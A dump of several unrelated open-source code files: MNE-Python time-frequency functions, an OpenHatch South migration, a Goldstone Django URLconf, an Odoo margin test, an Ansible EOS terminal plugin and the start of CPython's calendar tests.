picks = pick_types(info, meg=True, eeg=True, ref_meg=False,
exclude='bads')
if np.array_equal(picks, np.arange(len(data))):
picks = slice(None)
else:
info = pick_info(info, picks)
return info, data, picks
@verbose
def _induced_power_mtm(data, sfreq, frequencies, time_bandwidth=4.0,
use_fft=True, n_cycles=7, decim=1, n_jobs=1,
zero_mean=True, verbose=None):
"""Compute time induced power and inter-trial phase-locking factor
The time frequency decomposition is done with DPSS wavelets
Parameters
----------
data : np.ndarray, shape (n_epochs, n_channels, n_times)
The input data.
sfreq : float
sampling Frequency
frequencies : np.ndarray, shape (n_frequencies,)
Array of frequencies of interest
time_bandwidth : float
Time x (Full) Bandwidth product.
The number of good tapers (low-bias) is chosen automatically based on
this to equal floor(time_bandwidth - 1). Default is 4.0 (3 tapers).
use_fft : bool
Compute transform with fft based convolutions or temporal
convolutions. Defaults to True.
n_cycles : float | np.ndarray shape (n_frequencies,)
Number of cycles. Fixed number or one per frequency. Defaults to 7.
decim: int
Temporal decimation factor. Defaults to 1.
n_jobs : int
        The number of CPUs used in parallel. If -1, all CPUs are used.
Requires joblib package. Defaults to 1.
zero_mean : bool
Make sure the wavelets are zero mean. Defaults to True.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : np.ndarray, shape (n_channels, n_frequencies, n_times)
Induced power. Squared amplitude of time-frequency coefficients.
itc : np.ndarray, shape (n_channels, n_frequencies, n_times)
Phase locking value.
"""
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
logger.info('Data is %d trials and %d channels', n_epochs, n_channels)
n_frequencies = len(frequencies)
logger.info('Multitaper time-frequency analysis for %d frequencies',
n_frequencies)
# Precompute wavelets for given frequency range to save time
Ws = _dpss_wavelet(sfreq, frequencies, n_cycles=n_cycles,
time_bandwidth=time_bandwidth, zero_mean=zero_mean)
n_taps = len(Ws)
logger.info('Using %d tapers', n_taps)
n_times_wavelets = Ws[0][0].shape[0]
if n_times <= n_times_wavelets:
warnings.warn("Time windows are as long or longer than the epoch. "
"Consider reducing n_cycles.")
psd = np.zeros((n_channels, n_frequencies, n_times))
itc = np.zeros((n_channels, n_frequencies, n_times))
parallel, my_time_frequency, _ = parallel_func(_time_frequency,
n_jobs)
for m in range(n_taps):
psd_itc = parallel(my_time_frequency(data[:, c, :],
Ws[m], use_fft, decim)
for c in range(n_channels))
for c, (psd_c, itc_c) in enumerate(psd_itc):
psd[c, :, :] += psd_c
itc[c, :, :] += itc_c
psd /= n_taps
itc /= n_taps
return psd, itc
@verbose
def tfr_multitaper(inst, freqs, n_cycles, time_bandwidth=4.0,
use_fft=True, return_itc=True, decim=1, n_jobs=1,
picks=None, verbose=None):
"""Compute Time-Frequency Representation (TFR) using DPSS wavelets
Parameters
----------
inst : Epochs | Evoked
The epochs or evoked object.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
The time-window length is thus T = n_cycles / freq.
time_bandwidth : float, (optional)
Time x (Full) Bandwidth product. Should be >= 2.0.
Choose this along with n_cycles to get desired frequency resolution.
The number of good tapers (least leakage from far away frequencies)
is chosen automatically based on this to floor(time_bandwidth - 1).
Default is 4.0 (3 good tapers).
E.g., With freq = 20 Hz and n_cycles = 10, we get time = 0.5 s.
If time_bandwidth = 4., then frequency smoothing is (4 / time) = 8 Hz.
use_fft : bool
        Whether to use FFT-based convolution.
Defaults to True.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
Defaults to True.
decim : int
The decimation factor on the time axis. To reduce memory usage.
Note than this is brute force decimation, no anti-aliasing is done.
Defaults to 1.
n_jobs : int
The number of jobs to run in parallel. Defaults to 1.
picks : array-like of int | None
        The indices of the channels to compute the TFR on. If None, all
        good MEG and EEG channels are used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : AverageTFR
The averaged power.
itc : AverageTFR
The intertrial coherence (ITC). Only returned if return_itc
is True.
See Also
--------
    tfr_morlet, tfr_stockwell
Notes
-----
.. versionadded:: 0.9.0
"""
data = _get_data(inst, return_itc)
info = inst.info
info, data, picks = _prepare_picks(info, data, picks)
    data = data[:, picks, :]
power, itc = _induced_power_mtm(data, sfreq=info['sfreq'],
frequencies=freqs, n_cycles=n_cycles,
time_bandwidth=time_bandwidth,
use_fft=use_fft, decim=decim,
n_jobs=n_jobs, zero_mean=True,
verbose='INFO')
times = inst.times[::decim].copy()
nave = len(data)
    out = AverageTFR(info, power, times, freqs, nave,
                     method='multitaper-power')
if return_itc:
        out = (out, AverageTFR(info, itc, times, freqs, nave,
                               method='multitaper-itc'))
return out
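# Illustrative sketch (added comment): multitaper TFR with broader spectral
# smoothing. `epochs` is assumed to exist; the parameter values are examples.
#
#     >>> import numpy as np
#     >>> power, itc = tfr_multitaper(epochs, freqs=np.arange(8., 40., 2.),
#     ...                             n_cycles=10, time_bandwidth=8.0)  # doctest: +SKIP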
def combine_tfr(all_tfr, weights='nave'):
"""Merge AverageTFR data by weighted addition
Create a new AverageTFR instance, using a combination of the supplied
instances as its data. By default, the mean (weighted by trials) is used.
Subtraction can be performed by passing negative weights (e.g., [1, -1]).
Data must have the same channels and the same time instants.
Parameters
----------
all_tfr : list of AverageTFR
The tfr datasets.
weights : list of float | str
The weights to apply to the data of each AverageTFR instance.
Can also be ``'nave'`` to weight according to tfr.nave,
or ``'equal'`` to use equal weighting (each weighted as ``1/N``).
Returns
-------
tfr : AverageTFR
The new TFR data.
Notes
-----
.. versionadded:: 0.11.0
"""
tfr = all_tfr[0].copy()
if isinstance(weights, string_types):
if weights not in ('nave', 'equal'):
raise ValueError('Weights must be a list of float, or "nave" or '
'"equal"')
if weights == 'nave':
weights = np.array([e.nave for e in all_tfr], float)
weights /= weights.sum()
else: # == 'equal'
weights = [1. / len(all_tfr)] * len(all_tfr)
weights = np.array(weights, float)
if weights.ndim != 1 or weights.size != len(all_tfr):
raise ValueError('Weights must be the same size as all_tfr')
ch_names = tfr.ch_names
for t_ in all_tfr[1:]:
assert t_.ch_names == ch_names, ValueError("%s and %s do not contain "
"the same channels"
% (tfr, t_))
assert np.max(np.abs(t_.times - tfr.times)) < 1e-7, \
ValueError("%s and %s do not contain the same time instants"
% (tfr, t_))
# use union of bad channels
bads = list(set(tfr.info['bads']).union(*(t_.info['bads']
for t_ in all_tfr[1:])))
tfr.info['bads'] = bads
tfr.data = sum(w * t_.data for w, t_ in zip(weights, all_tfr))
tfr.nave = max(int(1. / sum(w ** 2 / e.nave
for w, e in zip(weights, all_tfr))), 1)
return tfr
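# Illustrative sketch (added comment): averaging and contrasting conditions.
# `tfr_a` and `tfr_b` are assumed to be AverageTFR instances with matching
# channels, times and frequencies.
#
#     >>> grand_avg = combine_tfr([tfr_a, tfr_b], weights='nave')  # doctest: +SKIP
#     >>> contrast = combine_tfr([tfr_a, tfr_b], weights=[1, -1])  # doctest: +SKIP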
| bsd-3-clause | 7,254,544,774,290,642,000 | 37.280726 | 79 | 0.574501 | false |
ojengwa/oh-mainline | mysite/profile/migrations/0026_asheesh_profile_missing_fields.py | 17 | 8009 | # This file is part of OpenHatch.
# Copyright (C) 2009 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.profile.models import *
class Migration:
def forwards(self, orm):
# Changing field 'Person.time_record_was_created'
db.alter_column('profile_person', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 278003)))
# Changing field 'Link_Person_Tag.time_record_was_created'
db.alter_column('profile_link_person_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 961204)))
# Changing field 'Link_ProjectExp_Tag.time_record_was_created'
db.alter_column('profile_link_projectexp_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 755933)))
# Changing field 'Link_Project_Tag.time_record_was_created'
db.alter_column('profile_link_project_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 866409)))
def backwards(self, orm):
# Changing field 'Person.time_record_was_created'
db.alter_column('profile_person', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 59, 84981)))
# Changing field 'Link_Person_Tag.time_record_was_created'
db.alter_column('profile_link_person_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 58, 588616)))
# Changing field 'Link_ProjectExp_Tag.time_record_was_created'
db.alter_column('profile_link_projectexp_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 58, 771680)))
# Changing field 'Link_Project_Tag.time_record_was_created'
db.alter_column('profile_link_project_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 59, 213551)))
models = {
'profile.person': {
'gotten_name_from_ohloh': ('models.BooleanField', [], {'default': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'interested_in_working_on': ('models.CharField', [], {'default': "''", 'max_length': '1024'}),
'last_polled': ('models.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_touched': ('models.DateTimeField', [], {'null': 'True'}),
'name': ('models.CharField', [], {'max_length': '200'}),
'ohloh_grab_completed': ('models.BooleanField', [], {'default': 'False'}),
'password_hash_md5': ('models.CharField', [], {'max_length': '200'}),
'poll_on_next_web_view': ('models.BooleanField', [], {'default': 'True'}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 59, 227203)'}),
'username': ('models.CharField', [], {'max_length': '200'})
},
'profile.link_person_tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'person': ('models.ForeignKey', ["orm['profile.Person']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 58, 733233)'})
},
'profile.tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('models.ForeignKey', ["orm['profile.TagType']"], {}),
'text': ('models.CharField', [], {'max_length': '50'})
},
'profile.link_projectexp_tag': {
'Meta': {'unique_together': "[('tag','project_exp','source'),]"},
'favorite': ('models.BooleanField', [], {'default': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'project_exp': ('models.ForeignKey', ["orm['profile.ProjectExp']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 59, 15948)'})
},
'profile.sourceforgeperson': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'username': ('models.CharField', [], {'max_length': '200'})
},
'profile.link_project_tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'project': ('models.ForeignKey', ["orm['search.Project']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 58, 919459)'})
},
'profile.sourceforgeproject': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'unixname': ('models.CharField', [], {'max_length': '200'})
},
'search.project': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person','project'),]"},
'date_collected': ('models.DateTimeField', [], {}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('models.BooleanField', [], {'default': 'False'}),
'person': ('models.ForeignKey', ["orm['profile.SourceForgePerson']"], {}),
'position': ('models.CharField', [], {'max_length': '200'}),
'project': ('models.ForeignKey', ["orm['profile.SourceForgeProject']"], {})
},
'profile.tagtype': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'name': ('models.CharField', [], {'max_length': '100'}),
'prefix': ('models.CharField', [], {'max_length': '20'})
},
'profile.projectexp': {
'description': ('models.TextField', [], {}),
'favorite': ('models.BooleanField', [], {'default': '0'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'last_touched': ('models.DateTimeField', [], {'null': 'True'}),
'man_months': ('models.PositiveIntegerField', [], {'null': 'True'}),
'person': ('models.ForeignKey', ["orm['profile.Person']"], {}),
'person_role': ('models.CharField', [], {'max_length': '200'}),
'primary_language': ('models.CharField', [], {'max_length': '200', 'null': 'True'}),
'project': ('models.ForeignKey', ["orm['search.Project']"], {}),
'source': ('models.CharField', [], {'max_length': '100', 'null': 'True'}),
'time_record_was_created': ('models.DateTimeField', [], {'null': 'True'}),
'url': ('models.URLField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['profile']
| agpl-3.0 | -1,550,465,198,877,533,000 | 56.207143 | 163 | 0.561119 | false |
slashk/goldstone-server | goldstone/nova/urls.py | 1 | 2240 | """Nova app URLconf."""
# Copyright 2015 Solinea, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import url, patterns
from goldstone.core.views import SavedSearchViewSet
from .views import AgentsDataView, AggregatesDataView, AvailZonesDataView, \
CloudpipesDataView, FlavorsDataView, FloatingIpPoolsDataView, \
HostsDataView, HypervisorsDataView, NetworksDataView, SecGroupsDataView, \
ServersDataView, ServicesDataView
# Views handled by DjangoRestFramework Views.
urlpatterns = patterns(
'',
url(r'^agents', AgentsDataView.as_view(), name='nova-agents'),
url(r'^aggregates', AggregatesDataView.as_view(), name='nova-aggregates'),
url(r'^availability_zones',
AvailZonesDataView.as_view(),
name='nova-availability-zones'),
url(r'^cloudpipes', CloudpipesDataView.as_view(), name='nova-cloudpipes'),
url(r'^flavors', FlavorsDataView.as_view(), name='nova-flavors'),
url(r'^floating_ip_pools',
FloatingIpPoolsDataView.as_view(),
name='nova-floating-ip-pools'),
url(r'^hosts', HostsDataView.as_view(), name='nova-hosts'),
url(r'^hypervisors',
HypervisorsDataView.as_view(),
name='nova-hypervisors'),
url(r'^networks', NetworksDataView.as_view(), name='nova-networks'),
url(r'^security_groups',
SecGroupsDataView.as_view(),
name='nova-security-groups'),
url(r'^servers', ServersDataView.as_view(), name='nova-servers'),
url(r'^services', ServicesDataView.as_view(), name='nova-services'),
)
# Other views.
urlpatterns += patterns(
'',
url(r'^hypervisor/spawns/', SavedSearchViewSet.as_view(
{'get': 'results'}), {'uuid': '21f5c6db-5a2e-41d4-9462-c3cdc03a837b'})
)
| apache-2.0 | 2,796,624,525,026,355,000 | 41.264151 | 78 | 0.705804 | false |
akretion/odoo | addons/product_margin/tests/test_product_margin.py | 17 | 2867 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import tools
from odoo.tests import common, Form
from odoo.modules.module import get_resource_path
class TestProductMargin(common.TransactionCase):
def create_account_invoice(self, invoice_type, partner, product, quantity=0.0, price_unit=0.0):
""" Create an invoice as in a view by triggering its onchange methods"""
invoice_form = Form(self.env['account.invoice'].with_context(type=invoice_type))
invoice_form.partner_id = partner
with invoice_form.invoice_line_ids.new() as line:
line.product_id = product
line.quantity = quantity
line.price_unit = price_unit
invoice = invoice_form.save()
invoice.action_invoice_open()
return invoice
def test_product_margin(self):
''' In order to test the product_margin module '''
# load account_minimal_test.xml file for chart of account in configuration
tools.convert_file(self.cr, 'product_margin',
get_resource_path('account', 'test', 'account_minimal_test.xml'),
{}, 'init', False, 'test', self.registry._assertion_report)
supplier = self.env['res.partner'].create({'name': 'Supplier', 'supplier': True})
customer = self.env['res.partner'].create({'name': 'Customer', 'customer': True})
ipad = self.env.ref("product.product_product_4")
# Create supplier invoice and customer invoice to test product margin.
# Define supplier invoices
self.create_account_invoice('in_invoice', supplier, ipad, 10.0, 300.00)
self.create_account_invoice('in_invoice', supplier, ipad, 4.0, 450.00)
# Define Customer Invoices
self.create_account_invoice('out_invoice', customer, ipad, 20.0, 750.00)
self.create_account_invoice('out_invoice', customer, ipad, 10.0, 550.00)
result = ipad._compute_product_margin_fields_values()
# Sale turnover ( Quantity * Price Subtotal / Quantity)
sale_turnover = ((20.0 * 750.00) + (10.0 * 550.00))
# Expected sale (Total quantity * Sale price)
sale_expected = (750.00 * 30.0)
# Purchase total cost (Quantity * Unit price)
purchase_total_cost = ((10.0 * 300.00) + (4.0 * 450.00))
# Purchase normal cost ( Total quantity * Cost price)
purchase_normal_cost = (14.0 * 500.00)
total_margin = sale_turnover - purchase_total_cost
expected_margin = sale_expected - purchase_normal_cost
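        # Worked numbers for the invoices above (added note):
        #   sale_turnover        = 20 * 750 + 10 * 550 = 20500
        #   purchase_total_cost  = 10 * 300 + 4 * 450  = 4800
        #   total_margin         = 20500 - 4800        = 15700
        #   sale_expected        = 750 * 30            = 22500
        #   purchase_normal_cost = 14 * 500            = 7000
        #   expected_margin      = 22500 - 7000        = 15500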
# Check total margin
self.assertEqual(result[ipad.id]['total_margin'], total_margin, "Wrong Total Margin.")
# Check expected margin
self.assertEqual(result[ipad.id]['expected_margin'], expected_margin, "Wrong Expected Margin.")
| agpl-3.0 | -5,859,089,607,675,463,000 | 43.107692 | 103 | 0.640042 | false |
ptisserand/ansible | lib/ansible/plugins/terminal/eos.py | 24 | 3304 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils._text import to_bytes, to_text
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error"),
# re.compile(br"^% \w+", re.M),
re.compile(br"% User not present"),
re.compile(br"% ?Bad secret"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"[^\r\n]+ not found", re.I),
re.compile(br"'[^']' +returned error code: ?\d+"),
re.compile(br"[^\r\n]\/bin\/(?:ba)?sh"),
re.compile(br"% More than \d+ OSPF instance", re.I)
]
def on_open_shell(self):
try:
for cmd in (b'terminal length 0', b'terminal width 512'):
self._exec_cli_command(cmd)
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
def on_become(self, passwd=None):
if self._get_prompt().endswith(b'#'):
return
cmd = {u'command': u'enable'}
if passwd:
cmd[u'prompt'] = to_text(r"[\r\n]?password: $", errors='surrogate_or_strict')
cmd[u'answer'] = passwd
cmd[u'prompt_retry_check'] = True
try:
self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
prompt = self._get_prompt()
if prompt is None or not prompt.endswith(b'#'):
raise AnsibleConnectionFailure('failed to elevate privilege to enable mode still at prompt [%s]' % prompt)
except AnsibleConnectionFailure as e:
prompt = self._get_prompt()
raise AnsibleConnectionFailure('unable to elevate privilege to enable mode, at prompt [%s] with error: %s' % (prompt, e.message))
def on_unbecome(self):
prompt = self._get_prompt()
if prompt is None:
# if prompt is None most likely the terminal is hung up at a prompt
return
if b'(config' in prompt:
self._exec_cli_command(b'end')
self._exec_cli_command(b'disable')
elif prompt.endswith(b'#'):
self._exec_cli_command(b'disable')
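# Illustrative note (added comment): the prompt patterns above are meant to
# match typical EOS CLI prompts, e.g. (assuming the class-level regexes):
#
#     >>> bool(TerminalModule.terminal_stdout_re[0].search(b'switch1#'))
#     True
#     >>> bool(TerminalModule.terminal_stdout_re[0].search(b'switch1(config)# '))
#     True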
| gpl-3.0 | -7,687,931,931,815,183,000 | 36.545455 | 141 | 0.609262 | false |
837278709/metro-openerp | metro_purchase/wizard/__init__.py | 2 | 1172 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pur_req_po
import confirm_msg
import pur_history
import pay_po
import pur_invoice
import purchase_order_group
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 8,202,400,713,391,251,000 | 39.413793 | 79 | 0.627986 | false |
nuanri/hiblog | src/database.py | 1 | 2672 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
ORMBase = declarative_base()
# DB_URI = 'sqlite:///:memory:'
DB_URI = 'sqlite:///auth.db'
def get_db_session():
dbengine = create_engine(DB_URI, echo=False)
session_factory = sessionmaker(bind=dbengine)
Session = scoped_session(session_factory)
return Session
def create_all():
dbengine = create_engine(DB_URI, echo=True)
ORMBase.metadata.create_all(dbengine)
import datetime
from sqlalchemy.orm import relationship, backref
from sqlalchemy import Table, Column, ForeignKey, Sequence
from sqlalchemy import Integer, String, Boolean, DateTime, Text
def _(s):
return s
class User(ORMBase):
__tablename__ = 'auth_user'
id = Column(Integer, Sequence('auth_user_id_seq'), primary_key=True)
uid = Column(Integer, unique=True, doc=_('User ID'))
username = Column(String(32), unique=True, doc=_('Username'))
password = Column(String(512), doc=_('Password'))
email = Column(String(30), unique=True, doc=_('Email'))
first_name = Column(String(30), doc=_('First Name'))
last_name = Column(String(30), doc=_('Last Name'))
nickname = Column(String(30), doc=_('Nickname'))
gender = Column(Integer, doc=_('Gender'))
is_active = Column(Boolean, default=True, doc=_('User is active'))
is_staff = Column(Boolean, default=False, doc=_('User is staff'))
is_superuser = Column(Boolean, default=False, doc=_('This is super user'))
is_locked = Column(Boolean, default=False, doc=_('User has beed locked'))
language = Column(String(12), default='zh_CN', doc=_('The locale language'))
last_active = Column(DateTime())
last_login = Column(DateTime())
date_joined = Column(DateTime(), default=datetime.datetime.utcnow)
@property
def fullname(self):
return '{} {}'.format(self.first_name, self.last_name)
class Session(ORMBase):
__tablename__ = 'auth_session'
id = Column(Integer, Sequence('auth_session_id_seq'), primary_key=True)
sid = Column(String(128), unique=True)
user_id = Column(Integer, ForeignKey('auth_user.id'))
user = relationship("User", backref='sessions')
    from_ip = Column(String(64))  # source IP of the current session, useful for extra security checks
expired = Column(DateTime())
def is_valid(self):
return datetime.datetime.utcnow() < self.expired
#if __name__ == '__main__':
# create_all()
# quick test: create a new user
'''
u = User(username='abc', password='xxxx')
Session = get_db_session()
db = Session()
db.add(u)
db.commit()
'''
| mit | -3,953,856,435,796,165,000 | 26.154639 | 80 | 0.659074 | false |
mancoast/CPythonPyc_test | fail/330_test_calendar.py | 3 | 37965 | import calendar
import unittest
from test import support
from test.script_helper import assert_python_ok
import time
import locale
import sys
result_2004_01_text = """
January 2004
Mo Tu We Th Fr Sa Su
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
"""
result_2004_text = """
2004
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5 6 7
5 6 7 8 9 10 11 2 3 4 5 6 7 8 8 9 10 11 12 13 14
12 13 14 15 16 17 18 9 10 11 12 13 14 15 15 16 17 18 19 20 21
19 20 21 22 23 24 25 16 17 18 19 20 21 22 22 23 24 25 26 27 28
26 27 28 29 30 31 23 24 25 26 27 28 29 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 2 1 2 3 4 5 6
5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13
12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20
19 20 21 22 23 24 25 17 18 19 20 21 22 23 21 22 23 24 25 26 27
26 27 28 29 30 24 25 26 27 28 29 30 28 29 30
31
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5
5 6 7 8 9 10 11 2 3 4 5 6 7 8 6 7 8 9 10 11 12
12 13 14 15 16 17 18 9 10 11 12 13 14 15 13 14 15 16 17 18 19
19 20 21 22 23 24 25 16 17 18 19 20 21 22 20 21 22 23 24 25 26
26 27 28 29 30 31 23 24 25 26 27 28 29 27 28 29 30
30 31
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 1 2 3 4 5 6 7 1 2 3 4 5
4 5 6 7 8 9 10 8 9 10 11 12 13 14 6 7 8 9 10 11 12
11 12 13 14 15 16 17 15 16 17 18 19 20 21 13 14 15 16 17 18 19
18 19 20 21 22 23 24 22 23 24 25 26 27 28 20 21 22 23 24 25 26
25 26 27 28 29 30 31 29 30 27 28 29 30 31
"""
result_2004_html = """
<?xml version="1.0" encoding="%(e)s"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=%(e)s" />
<link rel="stylesheet" type="text/css" href="calendar.css" />
<title>Calendar for 2004</title>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="year">
<tr><th colspan="3" class="year">2004</th></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">January</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">February</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">March</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
